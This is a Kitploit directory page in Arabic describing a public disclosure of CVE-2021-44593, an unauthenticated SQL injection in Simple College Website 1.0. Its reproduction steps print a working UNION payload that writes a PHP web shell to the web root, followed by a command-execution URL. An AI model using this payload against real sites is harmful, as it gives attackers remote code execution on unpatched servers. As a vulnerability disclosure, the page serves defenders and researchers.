Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44593 — إفصاح عام وتقرير تفصيلي عن CVE-2021-44593، وهو حقن SQL غير مصادق عليه في موقع الكلية البسيط (Simple College Website) يؤدي إلى رفع ملفات تعسفي وتنفيذ تعليمات برمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/mister-joe/cve-2021-44593
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

إفصاح عام وتقرير تفصيلي عن CVE-2021-44593، وهو حقن SQL غير مصادق عليه في موقع الكلية البسيط (Simple College Website) يؤدي إلى رفع ملفات تعسفي وتنفيذ تعليمات برمجية عن بُعد.

عرض المستودع
22منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44593

إفصاح عام عن CVE-2021-44593. ثغرة حقن SQL/رفع ملفات تعسفي/تنفيذ أوامر عن بُعد في موقع الكلية البسيط.

الوصف

موقع الكلية البسيط الإصدار 1.0 معرّض لثغرة حقن SQL قائمة على UNION بدون مصادقة في معامل "username" في صفحة /admin/login.php، والتي يمكن استغلالها لاحقًا لرفع ملفات تعسفية والحصول على تنفيذ أوامر عن بُعد.

المكونات المتأثرة

الدالة login() في admin_class.php

خطوات إعادة الإنتاج

  1. الوصول إلى صفحة تسجيل دخول المشرف (عادةً /admin/login.php)
  2. إرسال نموذج تسجيل الدخول مع معامل POST "username" الذي يحتوي على حقن SQL القائم على UNION التالي:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. الانتقال إلى /testing.php?cmd=id

ملاحظات

  1. يلزم معرفة موقع الدليل الجذر لخادم الويب.
  • قد يلزم أيضًا معرفة موقع الدليل الجذر للمستندات إذا لم يكن هو نفسه الدليل الجذر لخادم الويب.
  • علاوةً على ذلك، يجب أن يمتلك خادم MySQL صلاحيات الكتابة على الدليل المذكور.
  • تنزيل الأداة